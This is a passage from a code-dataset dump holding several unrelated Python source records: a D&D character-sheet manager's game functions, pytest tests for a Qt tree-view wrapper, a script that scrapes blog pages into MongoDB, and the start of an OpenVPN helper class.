It appears your character has negative HP!')\n        print('According to the rules, you must succeed on three death '\n              'saving throws.\\n')\n\n        print('You already have:')\n        print(f'- {character.checks_succeeded} successful checks.')\n        print(f'- {character.checks_failed} failed checks.\\n')\n\n        print('Press ENTER to do another check.')\n        input()\n\n        if config['DICE ROLL'] == 'VIRTUAL':\n            result = d20.roll()\n        else:  # config['DICE ROLL'] == 'PHYSICAL'\n            result = get_typed_dice(\n                dice=d20,\n                objective='make another saving throw against death.'\n            )\n\n        print(f'You have rolled a {result}.')\n\n        if result == 1:\n            print('It is a critical failure! It counts twice.')\n            character.checks_failed += 2\n        elif result < 10:\n            print('It is a failure!')\n            character.checks_failed += 1\n        elif result < 20:\n            print('It is a success!')\n            character.checks_succeeded += 1\n        else:  # result == 20\n            print('It is a critical success!')\n            character.checks_succeeded += 2\n\n        if character.checks_succeeded >= 3 \\\n                or character.checks_failed >= 3:\n            end = True\n\n            if character.checks_succeeded >= 3:\n                character.general_stats['CURRENT HP'] = 0\n                character.checks_failed = 0\n                character.checks_succeeded = 0\n                print('')\n                print('You now have 3 successes. You are stable at 0 HP.')\n            else:  # character.checks_failed >= 3\n                character.dead = True\n                print('')\n                print('You now have 3 failures.')\n                print('Unfortunately, you died.')\n\n\ndef modify_hp(character):\n    loop = True\n    while loop:\n        answer = select(\n            options=[\n                'TAKE DAMAGE', 'RECOVER HP',\n                'REMOVE TEMPORARY HP', 'ADD TEMPORARY HP',\n            ],\n            prompt='Current HP/Temporary HP/Maximum HP: '\n                   f'{character.general_stats[\"CURRENT HP\"]}/'\n                   f'{character.general_stats[\"TEMPORARY HP\"]}/'\n                   f'{character.general_stats[\"MAXIMUM HP\"]}\\n\\n'\n                   'You have a few options to modify '\n                   'your HP. 
Choose the appropriate one.',\n            single_item=True\n        )\n\n        if answer == 'EXIT':\n            return answer\n\n        elif answer == 'GO BACK':\n            loop = False\n\n        elif answer == 'TAKE DAMAGE':\n            damage = get_a_number('Type the amount of damage taken.')\n\n            if damage is not None:\n                character.general_stats['CURRENT HP'] -= damage\n\n        elif answer == 'RECOVER HP':\n            recovered = get_a_number(\n                'Type the number of HP recovered.\\n'\n                \"If you want to go back, just type anything that's not a number.\"\n            )\n\n            if recovered is not None:\n                if character.general_stats['CURRENT HP'] + recovered \\\n                        <= character.general_stats['MAXIMUM HP'] \\\n                        + character.general_stats['TEMPORARY HP']:\n                    character.general_stats['CURRENT HP'] += recovered\n                else:\n                    character.general_stats['CURRENT HP'] = \\\n                        character.general_stats['MAXIMUM HP'] \\\n                        + character.general_stats['TEMPORARY HP']\n\n        elif answer == 'ADD TEMPORARY HP':\n            temporary = get_a_number(\n                f'Your current temporary HP is '\n                f'{character.general_stats[\"TEMPORARY HP\"]}\\n\\n'\n                'Type the number of added temporary HP.'\n            )\n\n            if temporary is not None:\n                character.general_stats['TEMPORARY HP'] += temporary\n\n        elif answer == 'REMOVE TEMPORARY HP':\n            temporary = get_a_number(\n                'Your current temporary HP is '\n                f'{character.general_stats[\"TEMPORARY HP\"]}\\n\\n'\n                'Type the number of removed temporary HP.'\n            )\n\n            if temporary is not None:\n                character.general_stats['TEMPORARY HP'] -= temporary\n\n        if character.general_stats['CURRENT HP'] \\\n                + character.general_stats['TEMPORARY HP'] \\\n                <= -character.general_stats['MAXIMUM HP']:\n            print('You died!')\n            print('The excess damage is bigger than your maximum HP.')\n            print('Press ENTER to continue...')\n            input()\n\n        # Strictly negative HP triggers death saving throws; exactly 0\n        # (falling unconscious) is handled in the branch below\n        elif character.general_stats['CURRENT HP'] \\\n                + character.general_stats['TEMPORARY HP'] \\\n                < 0:\n            character.checks_failed = 0\n            character.checks_succeeded = 0\n\n            death_check(character)\n\n        elif character.general_stats['CURRENT HP'] \\\n                + character.general_stats['TEMPORARY HP'] \\\n                == 0:\n            clear_terminal()\n            print('Your HP reached 0. You fall unconscious!')\n            print('Press ENTER to continue...')\n            input()\n            clear_terminal()\n\n    return None\n\n\ndef modify_equipment(character):\n    new_equipment, new_wealth = buy_equipment(\n        starting_wealth=character.wealth,\n        fixed_price=False\n    )\n\n    if new_equipment is None:\n        return 'EXIT'\n\n    new_equipment = group_equipment(new_equipment)\n\n    for category, equipments in new_equipment.items():\n        character.equipments[category] += equipments\n\n    character.wealth = new_wealth\n\n    return None\n\n\ndef add_xp(character):\n    new_xp = get_a_number('Type the amount of XP to add.')\n\n    if new_xp is not None:\n        character.general_info['XP'] += new_xp\n\n        while level_up(character):\n            pass\n\n\ndef roll_dice():\n    dice = None\n    while dice != '':\n        print('Type the dice you want to roll.')\n        print('Formats accepted: [1d4, 1D4, 1d4+1, 1d4 + 1, 1d4-1, 1D4 - 1].')\n        print('Type nothing to go back.')\n        dice = input()\n        print('')\n\n        if dice != '':\n            dice, modifier = convert_string_to_die(dice)\n\n            if dice is not None:\n                print('Your dice are valid! Press ENTER to roll them.')\n                input()\n\n                value = dice.roll(modifier)\n                print(f'You rolled {value}!')\n                print('Press ENTER to roll again.')\n                input()\n            else:\n                print('What you typed is not accepted. 
Please try again.')\n                print('Press ENTER to continue...')\n                input()\n\n        clear_terminal()\n\n\ndef play(character):\n    answer = None\n    what_to_do = [\n        'ROLL DICE',\n        'EQUIP ARMOR',\n        'MODIFY EQUIPMENT',\n        'MODIFY HP',\n        'CAST A SPELL',\n        'MAKE AN ATTACK',\n        'MAKE A SKILL CHECK',\n        'ADD XP',\n        'TAKE A REST',\n    ]\n\n    while answer != 'GO BACK':\n        answer = select(\n            options=what_to_do,\n            prompt='You are in play mode. What do you want to do?',\n            single_item=True,\n            finish=False\n        )\n\n        result = None\n        if answer == 'EQUIP ARMOR':\n            result = equip_armor(character)\n\n        elif answer == 'TAKE A REST':\n            result = rest(character)\n\n        elif answer == 'MODIFY HP':\n            result = modify_hp(character)\n\n        elif answer == 'MODIFY EQUIPMENT':\n            result = modify_equipment(character)\n\n        elif answer == 'ROLL DICE':\n            roll_dice()\n\n        elif answer == 'CAST A SPELL':\n            result = use_magic(character)\n\n        elif answer == 'ADD XP':\n            add_xp(character)\n\n        elif answer == 'MAKE AN ATTACK':\n            result = weapon_attack(character)\n\n        elif answer == 'MAKE A SKILL CHECK':\n            result = skill_check(character)\n\n        if result == 'EXIT':\n            answer = 'GO BACK'\n\n\ndef open_sheet(sheet):\n    options = [\n        'SEE SHEET', 'EDIT SHEET', 'PLAY WITH SHEET', 'DELETE SHEET'\n    ]\n    end = False\n\n    with open(sheet, 'rb') as file_object:\n        character = pickle.load(file_object)\n\n    while not end:\n        choice = select(\n            options=options,\n            prompt='What do you want to do?',\n            single_item=True,\n            go_back=False,\n        )\n        sheet = Path(sheet)\n\n        if choice == 'SEE SHEET':\n            show_character(character)\n        elif choice == 'EDIT SHEET':\n            succeeded = edit_character(character)\n\n            if succeeded is True:\n                save_sheet(character)\n        elif choice == 'PLAY WITH SHEET':\n            play(character)\n            save_sheet(character)\n        elif choice == 'DELETE SHEET':\n            delete_sheet(sheet)\n            end = True\n        else:\n            end = True\n\n        clear_terminal()\n\n\ndef create_new_sheet(character):\n    \"\"\"\n    Stores the character object in a file and adds its info to the index\n    :param character: object of the class character\n    :return: True if the sheet was created successfully, False otherwise\n    \"\"\"\n    cancel = False\n    folder = get_parent().joinpath('Files/Sheets')\n    new_path = folder.joinpath(\n        character.personal_info[\"CHARACTER'S NAME\"] + '.txt'\n    )\n\n    while new_path.exists() and not cancel:\n        options_text = [\n            'RENAME CHARACTER',\n            'OVERWRITE SHEET',\n            'CANCEL NEW CHARACTER'\n        ]\n        answer = select(\n            options=options_text,\n            prompt='It looks like a sheet with this name already exists.',\n            single_item=True\n        )\n\n        if answer == 'RENAME CHARACTER':\n            character.personal_info[\"CHARACTER'S NAME\"] = get_name()\n            new_path = folder.joinpath(\n                character.personal_info[\"CHARACTER'S NAME\"] + '.txt'\n            )\n        elif answer == 'OVERWRITE SHEET':\n            delete_sheet(new_path)\n        elif answer == 'CANCEL NEW CHARACTER':\n            cancel = True\n\n        clear_terminal()\n\n    if not cancel:\n        save_sheet(character)\n        return True\n    else:\n        return False\n\n\ndef get_config_value():\n    config_folder = get_parent().joinpath('Files')\n    config_file = config_folder.joinpath('config.txt')\n\n    if config_file.exists():\n        if os.path.getsize(config_file) > 0:\n            with open(config_file, 'rb') as config_txt:\n                value = pickle.load(config_txt)\n        else:\n            raise Exception('File config.txt empty!')\n    else:\n        # check_files() normally creates config.txt; fall back to the\n        # in-memory defaults if the file is missing\n        value = dict(config)\n\n    for configuration, status in config.items():\n        if configuration not in value.keys():\n            value[configuration] = status\n\n    return value\n\n\ndef routine_preparation():\n    check_files()\n    global config\n    config = get_config_value()\n    columns, lines = os.get_terminal_size()\n\n    while columns != 80:\n        
print(\n 'Please set your window for the width of 80 and then press '\n 'ENTER to continue'\n )\n input()\n\n columns, lines = os.get_terminal_size()\n\n clear_terminal()\n\n\ndef level_up(character):\n if character.general_info['XP'] >= character.xp_by_level[\n character.general_info['LEVEL'] + 1]:\n character.general_info['LEVEL'] += 1\n\n if character.general_info['LEVEL'] in [4, 8, 12, 16, 19]:\n answer = None\n\n added_points = {\n 'STR': 0,\n 'DEX': 0,\n 'CON': 0,\n 'INT': 0,\n 'WIS': 0,\n 'CHA': 0\n }\n\n points_to_increase = 2\n while answer != 'CONFIRM':\n prompt = f'You have {points_to_increase} points ' \\\n f'to add in abilities'\n\n options = {}\n if points_to_increase > 0:\n for ability, score in character.abilities.values.items():\n if score < 20:\n long_ability = index['ABILITIES'][ability]\n key = f'{long_ability.title()}: ' \\\n f'{score + added_points[ability]}'\n options[key] = ability\n\n if points_to_increase == 0:\n options['Confirm new values'] = 'CONFIRM'\n options['Restart values to original'] = 'RESTART'\n\n answer = select(\n options=options,\n prompt=prompt,\n show_type='key',\n return_type='value',\n single_item=True,\n )\n\n if answer != 'RESTART' and answer != 'CONFIRM':\n added_points[answer] += 1\n points_to_increase -= 1\n elif answer == 'RESTART':\n points_to_increase = 2\n added_points = {\n 'STR': 0,\n 'DEX': 0,\n 'CON': 0,\n 'INT': 0,\n 'WIS': 0,\n 'CHA': 0\n }\n\n for ability, increase in added_points.items():\n character.abilities.increment_ability(ability, increase)\n\n con_modifier = character.abilities.score('CON')\n if config['DICE ROLL'] == 'VIRTUAL':\n hp_addition = character.general_stats['HIT DICE'].roll(con_modifier)\n else: # config['DICE ROLL'] == 'PHYSICAL'\n hp_addition = get_typed_dice(\n dice=character.general_stats['HIT DICE'],\n objective='define your HP addition.'\n )\n hp_addition += con_modifier\n\n character.general_stats['MAXIMUM HP'] += hp_addition\n character.general_stats['CURRENT HP'] += hp_addition\n character.general_stats['HIT DICE'].number += 1\n # MULTICLASS\n\n character.specialization['NAME'] = character.specialization_check(\n character.general_info['LEVEL'],\n character.specialization['LEVEL'],\n character.specialization['ALL FEATURES'],\n character.specialization['NAME'],\n )\n character.specialization['FEATURES'] = \\\n character.select_specialization_features(\n level=character.general_info['LEVEL'],\n specialization_level=character.specialization['LEVEL'],\n specializations_features=character.specialization[\n 'ALL FEATURES'],\n specialization=character.specialization['NAME']\n )\n\n specializations_w_magic = ['ELDRITCH KNIGHT', 'ARCANE TRICKSTER']\n if character.specialization['NAME'] in specializations_w_magic:\n character.magical_ability.has_magic = True\n\n if character.general_info['CLASS'] in ['PALADIN', 'RANGER']:\n if character.general_info['LEVEL'] >= 2:\n character.magical_ability.has_magic = True\n\n # if character.magical_ability.prepared_spell is True:\n\n character.proficiencies['VALUE'] = character.backup[\n 'CLASS'].proficiency_by_level[character.general_info['LEVEL']]\n\n character.features['CLASS'] += character.backup['CLASS'].all_features[\n character.general_info['LEVEL']\n ]\n try:\n character.features['SPECIALIZATION'] += character.specialization[\n 'ALL FEATURES'][character.general_info['LEVEL']]\n except KeyError:\n pass\n\n if character.magical_ability.has_magic is not None:\n character.magical_ability.cantrips_known += \\\n character.magical_ability.cantrips_by_level[\n 
character.general_info['LEVEL']\n ]\n\n character.magical_ability.spells_known += character. \\\n magical_ability.spells_by_level[character.general_info['LEVEL']]\n\n character.magical_ability.spell_slots = character.magical_ability. \\\n spell_slots_by_level[character.general_info['LEVEL']]\n\n race_magic(\n race_name=character.general_info['RACE'],\n level=character.general_info['LEVEL'],\n magical_ability=character.magical_ability\n )\n\n return True\n else:\n return False\n\n\ndef edit_configurations():\n global config\n\n possible_values = {\n 'DICE ROLL': ['VIRTUAL', 'PHYSICAL'],\n 'ROLLS ALWAYS': ['NO', 'ASK'],\n 'ATTACK ALWAYS': ['NO', 'ASK'],\n 'SKILL CHECK ALWAYS': ['NO', 'ASK']\n }\n\n selected = None\n while selected != 'EXIT':\n options = {}\n for configuration, status in config.items():\n options[configuration] = configuration \\\n + ' ' \\\n + '.' * (75 - (len(configuration) + 2 + len(status))) \\\n + ' ' \\\n + status\n\n selected = select(\n options=options,\n prompt='Select a configuration to edit it.\\n',\n show_type='value',\n return_type='key',\n single_item=True,\n go_back=False\n )\n\n if selected != 'EXIT':\n clear_terminal()\n\n new_config = select(\n options=possible_values[selected],\n prompt=f'What is {selected} new value?',\n single_item=True\n )\n\n if new_config == 'EXIT':\n selected = 'EXIT'\n elif new_config != 'GO BACK':\n if selected == 'ROLLS ALWAYS':\n config['ATTACK ALWAYS'] = new_config\n config['SKILL CHECK ALWAYS'] = new_config\n\n config[selected] = new_config\n\n files_folder = check_files().joinpath('Files')\n file = files_folder.joinpath('config.txt')\n with open(file, 'wb') as config_file:\n pickle.dump(config, config_file)\n\n\ndef menu():\n \"\"\"\n Creates a menu for the user to choose what he wants to do\n :return:\n \"\"\"\n routine_preparation()\n end = False\n\n while not end:\n choices = [\n 'NEW SHEET',\n 'OPEN SHEET',\n 'ROLL DICE',\n 'OPEN CONFIGURATIONS'\n ]\n choice = select(\n options=choices,\n prompt='Welcome to Character Sheets Manager!\\n',\n single_item=True,\n go_back=False\n )\n clear_terminal()\n\n if choice == 'NEW SHEET':\n character = create_new_character()\n\n if character is not None:\n create_new_sheet(character)\n\n elif choice == 'OPEN SHEET':\n sheet_path = show_sheets()\n\n while sheet_path != 'GO BACK':\n open_sheet(sheet_path)\n sheet_path = show_sheets()\n\n elif choice == 'ROLL DICE':\n roll_dice()\n\n elif choice == 'OPEN CONFIGURATIONS':\n edit_configurations()\n\n elif choice == 'EXIT':\n end = True\n","repo_name":"LucasCardoso910/Character-Sheet-Manager","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":144293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74426343825","text":"from __future__ import unicode_literals\n\nimport pytest\n\nfrom pyvmmonitor_qt.pytest_plugin import qtapi # @UnusedImport\nfrom pyvmmonitor_qt.qt.QtWidgets import QWidget\n\n\n@pytest.fixture\ndef tree():\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n tree = QTreeView()\n tree = PythonicQTreeView(tree)\n yield tree\n from pyvmmonitor_qt import qt_utils\n if qt_utils.is_qobject_alive(tree.tree):\n tree.tree.deleteLater()\n tree = None\n from pyvmmonitor_qt.qt_event_loop import process_events\n process_events(collect=True)\n\n\ndef test_tree_view(qtapi, tree):\n from pyvmmonitor_qt import qt_utils\n from pyvmmonitor_qt.tree.pythonic_tree_view import 
TreeNode\n\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n\n # Usual API to use\n tree['a'] = [10, 20]\n tree['a.b'] = [20, 30]\n tree['a.c'] = ['30']\n tree['a.b.c'] = ['30', 40]\n\n assert qt_utils.list_wiget_item_captions(tree.tree, cols=(0, 1)) == [\n ['10', '20'], ['+20', '+30'], ['++30', '++40'], ['+30', '+']]\n\n tree['a'].expand()\n tree['a'].check(True)\n\n node = TreeNode([1, 2])\n assert not node.is_expanded()\n with pytest.raises(RuntimeError):\n node.expand(True)\n assert not node.is_expanded() # We can only expand after it's added to the tree\n with pytest.raises(RuntimeError):\n node.check(True)\n assert not node.is_checked()\n\n tree['a.d'] = node\n node.expand()\n node.check()\n assert node.is_expanded()\n assert node.is_checked()\n tree['a.d.c'] = [2, 4]\n tree['a.d.c'].expand()\n assert tree['a.d.c'].is_expanded()\n\n assert node.is_expanded()\n assert node.is_checked()\n assert not node.is_checked(1)\n\n from pyvmmonitor_qt.qt_event_loop import process_events\n process_events()\n assert node.is_expanded()\n assert node.is_checked()\n assert not node.is_checked(1)\n\n\ndef test_iter_nodes(qtapi, tree):\n tree.tree.show()\n\n tree['a'] = 10\n tree['b'] = 20\n tree['a.b'] = 30\n tree['a.b.c'] = 40\n tree['a.b.d'] = 41\n\n contents = []\n for node in tree.iternodes('a'):\n contents.append(node.obj_id)\n\n assert '\\n'.join(sorted(contents)) == '''a.b\na.b.c\na.b.d'''\n\n del tree['a.b']\n\n assert len(list(tree.iternodes('a'))) == 0\n\n\ndef test_tree_view_expand_remove(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree['a'].expand()\n from pyvmmonitor_qt.qt_utils import count_items\n assert count_items(tree.tree) == 1\n del tree['a']\n assert count_items(tree.tree) == 0\n\n\ndef test_hierarchy_different_from_ids(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n\n contents = []\n for node in tree.iternodes('a'):\n contents.append(node.obj_id)\n assert ''.join(contents) == 'a.b.c.d'\n\n from pyvmmonitor_qt.qt_utils import count_items\n assert count_items(tree.tree) == 2\n assert len(tree) == 2\n del tree['a']\n assert count_items(tree.tree) == 0\n\n\ndef test_clear(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n\n contents = []\n for node in tree.iternodes('a'):\n contents.append(node.obj_id)\n assert ''.join(contents) == 'a.b.c.d'\n\n from pyvmmonitor_qt import qt_utils\n assert qt_utils.count_items(tree.tree) == 2\n tree.clear()\n assert qt_utils.count_items(tree.tree) == 0\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n assert qt_utils.count_items(tree.tree) == 2\n\n\ndef test_color(qtapi, tree):\n tree.tree.show()\n tree['a'] = [10, 20]\n from pyvmmonitor_qt.qt.QtGui import QBrush\n from pyvmmonitor_qt.qt.QtGui import QColor\n from pyvmmonitor_qt.qt.QtCore import Qt\n tree['a'].set_foreground_brush(QBrush(QColor(Qt.red)))\n\n assert tree['a'].get_foreground_brush(0).color() == QColor(Qt.red)\n\n tree['a'].set_background_brush(QBrush(QColor(Qt.gray)))\n\n assert tree['a'].get_background_brush(0).color() == QColor(Qt.gray)\n\n\ndef test_selection(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n\n 
tree.set_selection(['a.b.c.d'])\n assert tree.get_selection() == ['a.b.c.d']\n\n tree.set_selection(['a', 'a.b.c.d'])\n assert tree.get_selection() == ['a', 'a.b.c.d']\n\n\ndef test_sort_order(qtapi, tree):\n '''\n By default there's no sorting (it's kept by insertion order), but it's possible to turn on the\n sorting to be used and set the sort key.\n '''\n tree.tree.show()\n\n tree['a'] = 'a'\n tree['c'] = 'c'\n tree['b'] = 'b'\n assert tree.list_item_captions() == 'a c b'.split()\n\n tree.sorting_enabled = True\n\n assert tree.list_item_captions() == 'a b c'.split()\n\n tree['d'] = 'a'\n assert tree.list_item_captions() == 'a a b c'.split()\n\n tree.sorting_enabled = False\n\n tree['e'] = 'b'\n assert tree.list_item_captions() == 'a a b c b'.split()\n\n tree.sorting_enabled = True\n\n assert tree.list_item_captions() == 'a a b b c'.split()\n\n with tree.batch_changes():\n tree['f'] = 'b'\n tree['g'] = 'a'\n assert not tree.sorting_enabled\n\n assert tree.list_item_captions() == 'a a a b b b c'.split()\n\n for node in tree.iternodes():\n # Reverse sort order\n node.sort_key = ord('z') - ord(node.data[0])\n\n # for node in sorted(tree.iternodes(), key=lambda node: node.sort_key):\n # print(node.obj_id, node.data, node.sort_key)\n\n tree.sort_strategy = 'sort_key'\n assert tree.list_item_captions() == list(reversed('a a a b b b c'.split()))\n\n tree.sort_strategy = 'display'\n assert tree.list_item_captions() == 'a a a b b b c'.split()\n\n # Now, let's change the caption and make sure it's still Ok.\n tree['g'].data = 'g'\n\n assert tree.list_item_captions() == 'a a b b b c g'.split()\n\n\ndef test_insert_order(qtapi, tree):\n tree.tree.show()\n\n tree['a'] = 'a'\n tree['c'] = 'c'\n tree['b'] = 'b'\n assert tree.list_item_captions() == 'a c b'.split()\n\n tree.add_node('a', 'a.x', 'x')\n\n assert tree.list_item_captions() == 'a +x c b'.split()\n\n tree.add_node('a', 'a.y', 'y', index=0)\n\n assert tree.list_item_captions() == 'a +y +x c b'.split()\n\n tree.add_node(None, 'z', 'z', index=1)\n\n assert tree.list_item_captions() == 'a +y +x z c b'.split()\n\n\ndef test_icon(qtapi):\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n\n # Example on how to deal with a mouse click.\n class MyQTreeView(QTreeView):\n\n def mousePressEvent(self, ev):\n index = self.indexAt(ev.pos())\n if index.isValid():\n # print('col', col, 'col_width', col_width, 'col_viewport_pos', col_viewport_pos)\n # print('relative', relative_x)\n if index.column() == 1:\n col = self.columnAt(ev.pos().x())\n col_width = self.columnWidth(col)\n col_viewport_pos = self.columnViewportPosition(col)\n relative_x = ev.pos().x() - col_viewport_pos\n\n node = tree.node_from_index(index)\n print(node.__class__, relative_x, col_width)\n ev.setAccepted(True)\n return\n return QTreeView.mousePressEvent(self, ev)\n\n tree = MyQTreeView()\n tree = PythonicQTreeView(tree)\n tree.columns = ['Caption', 'Action']\n tree.tree.show()\n\n tree['a'] = ('a', '')\n tree['c'] = ('c', '')\n tree['b'] = ('b', '')\n\n from pyvmmonitor_qt.qt.QtGui import QPixmap\n pixmap = QPixmap(30, 30)\n from pyvmmonitor_qt.qt.QtCore import Qt\n pixmap.fill(Qt.red)\n\n # Should show a red square for column 1\n tree['a'].set_item_role(Qt.DecorationRole, 1, pixmap)\n\n # __eq__ works properly for QImage but not QPixmap.\n assert tree['a'].item_role(Qt.DecorationRole, 1).toImage() == pixmap.toImage()\n tree.tree.hide()\n tree.tree.deleteLater()\n\n\ndef test_custom_widget(qtapi, tree):\n 
tree.columns = ['Caption', 'Action']\n tree.tree.show()\n\n tree['a'] = ('a', '')\n tree['c'] = ('c', '')\n tree['b'] = ('b', '')\n\n from pyvmmonitor_qt.qt.QtGui import QPixmap\n from pyvmmonitor_qt.qt.QtWidgets import QPushButton\n from pyvmmonitor_qt.qt.QtCore import Qt\n\n bt = QPushButton(None)\n icon = QPixmap(20, 20)\n icon.fill(Qt.red)\n from pyvmmonitor_qt.qt.QtGui import QIcon\n bt.setIcon(QIcon(icon))\n bt.setAutoFillBackground(True)\n\n # Should show a button at column 1\n tree['a'].set_item_custom_widget(1, bt)\n assert tree['a'].item_custom_widget(1) == bt\n\n\nclass FilteredTreeViewWidget(QWidget):\n\n def __init__(self, pythonic_tree_view=None):\n QWidget.__init__(self)\n from pyvmmonitor_qt.qt.QtWidgets import QVBoxLayout\n self._vbox = QVBoxLayout(self)\n\n from pyvmmonitor_qt.qt.QtWidgets import QLineEdit\n self._edit_text_filter = QLineEdit(self)\n self._vbox.addWidget(self._edit_text_filter)\n\n if pythonic_tree_view is None:\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n tree = QTreeView(self)\n pythonic_tree_view = PythonicQTreeView(tree)\n else:\n pythonic_tree_view.tree.setParent(self)\n\n self._vbox.addWidget(pythonic_tree_view.tree)\n self.setLayout(self._vbox)\n self._pythonic_tree_view = pythonic_tree_view\n\n self._edit_text_filter.textChanged.connect(self._on_filter_text_changed)\n\n def _on_filter_text_changed(self, *args, **kwargs):\n self._pythonic_tree_view.filter_text = self.filter_text\n\n @property\n def filter_text(self):\n return self._edit_text_filter.text()\n\n @filter_text.setter\n def filter_text(self, text):\n self._edit_text_filter.setText(text)\n self._pythonic_tree_view.filter_text = text\n\n @property\n def tree(self):\n return self._pythonic_tree_view.tree\n\n @property\n def pythonic_tree_view(self):\n return self._pythonic_tree_view\n\n\ndef test_filtering(qtapi, tree):\n\n tree.columns = ['Caption', 'Action']\n\n tree['a'] = 'aa', 'aab'\n tree['a.b'] = 'bb', 'bbb'\n\n filtered_tree = FilteredTreeViewWidget(tree)\n filtered_tree.filter_text = 'a'\n from pyvmmonitor_qt.qt_utils import list_wiget_item_captions\n assert list_wiget_item_captions(filtered_tree.tree) == ['aa']\n\n filtered_tree.filter_text = ''\n assert list_wiget_item_captions(filtered_tree.tree) == ['aa', '+bb']\n\n\n@pytest.fixture\ndef virtual_tree():\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n tree = QTreeView()\n\n def has_children(pythonic_tree, node):\n if node is None or node.data[0] == '1':\n return True\n return False\n\n def create_children(pythonic_tree, node):\n if node is None:\n pythonic_tree['1'] = '1'\n pythonic_tree['3'] = '2'\n else:\n if node.data[0] == '1':\n pythonic_tree.add_node(node, 'foo', '5')\n\n tree = PythonicQTreeView(tree, has_children=has_children, create_children=create_children)\n yield tree\n from pyvmmonitor_qt import qt_utils\n if qt_utils.is_qobject_alive(tree.tree):\n tree.tree.deleteLater()\n tree = None\n from pyvmmonitor_qt.qt_event_loop import process_events\n process_events(collect=True)\n\n\ndef test_virtual_model(qtapi, virtual_tree):\n from pyvmmonitor_qt.qt_utils import list_wiget_item_captions\n virtual_tree.tree.show()\n assert list_wiget_item_captions(virtual_tree.tree) == ['1', '+5', '2']\n virtual_tree.clear()\n assert list_wiget_item_captions(virtual_tree.tree) == 
[]\n","repo_name":"fabioz/pyvmmonitor-qt","sub_path":"_pyvmmonitor_qt_tests/test_pythonic_tree_view.py","file_name":"test_pythonic_tree_view.py","file_ext":"py","file_size_in_byte":12138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37249512542","text":"import json\nimport os\nimport sys\nfrom pymongo import MongoClient\nimport urllib3\nfrom bs4 import BeautifulSoup, SoupStrainer\n\n# Get Config file\nwith open(\"config.json\") as config_file:\n config = json.load(config_file)\n\n# Connect to mongo\nclient = MongoClient(\"mongodb://\" + os.environ['IP'] + \"/\") #for cloud nine, use MongoClient(config['db_url']) for config\ndb = client[config['db_client']]\n\npages = db.pages\narticles = db.articles\n\ncount = 0\n\nfor page in pages.find():\n\tbody = page['body']\n\tid = page['_id']\n\turl = page['url']\n\t\n\ttry:\n\t\tsoup = BeautifulSoup(body)\n\t\t\n\t\t# Meta indicators - specific to Joel on software\n\t\ttitle = soup.find('h2').getText()\n\t\tauthor = soup.find('div', {\"class\": \"author\"}).getText()\n\t\tdate = soup.find('div', {\"class\": \"date\"}).getText()\n\t\t\n\n\t\t\n\t\tif author.startswith('by '):\n\t\t\tauthor = author[3:]\n\t\t\n\t\tsplit_date = date.split(' ')\n\t\tdow = split_date[0][:-1]\n\t\tmonth = split_date[1]\n\t\tday = split_date[2][:-1]\n\t\tyear = split_date[3]\n\t\t\n\t\t\n\t\t#print(title.encode())\n\t\t#print(author.encode())\n\t\t#print(date.encode())\n\t\t#print(dow.encode())\n\t\t#print(month.encode())\n\t\t#print(day.encode())\n\t\t#print(year.encode())\n\t\t#print(\"#\")\n\t\t\n\t\tjson_article = {\n\t\t\t\"title\": title,\n\t\t\t\"author\": author,\n\t\t\t\"date\": date,\n\t\t\t\"dow\": dow,\n\t\t\t\"day\": day,\n\t\t\t\"month\": month,\n\t\t\t\"year\": year,\n\t\t\t\"body\": body,\n\t\t\t\"page\": id,\n\t\t\t\"url\": url\n\t\t}\n\t\t\n\t\tarticles.insert_one(json_article)\n\t\t\n\t\tcount = count + 1\n\t\n\texcept:\n\t\tprint(\"Error\")\n\nprint(count)\n\t\n","repo_name":"ash-williams/NLP_MiniProject","sub_path":"old_scripts/4-cleanHTML2.py","file_name":"4-cleanHTML2.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10641805191","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=R0904\n\n\"\"\"File that contains SimplifiedOpenvpnHelper class.\"\"\"\n\nimport os\nimport socket\nimport inspect\nimport hashlib\nfrom requests import get\n\n\nclass SimplifiedOpenvpnHelper:\n \"\"\"Class that contains shareable helper methods.\"\"\"\n\n @staticmethod\n def current_method():\n \"\"\"Returns name of the current method.\"\"\"\n return inspect.stack()[1][3]\n\n @staticmethod\n def read_file_as_value(filename, verbose=False):\n \"\"\"Reads contents of the file and returns it.\"\"\"\n if not os.path.isfile(filename):\n if verbose:\n print(\"> File that you tried to read as value doesn't exist.\")\n return None\n\n value = None\n with open(filename) as content:\n value = content.read().rstrip()\n return value\n\n @staticmethod\n def create_directory(value, mode=0o700):\n \"\"\"Creates new directory on filesystem.\"\"\"\n if not os.path.exists(value):\n os.makedirs(value, mode)\n\n @staticmethod\n def sanitize_path(path):\n \"\"\"Makes sure that path are ending with forward slash.\"\"\"\n if os.path.isfile(path):\n if path.endswith('/'):\n path = path.rstrip('/')\n elif os.path.isdir(path):\n if not 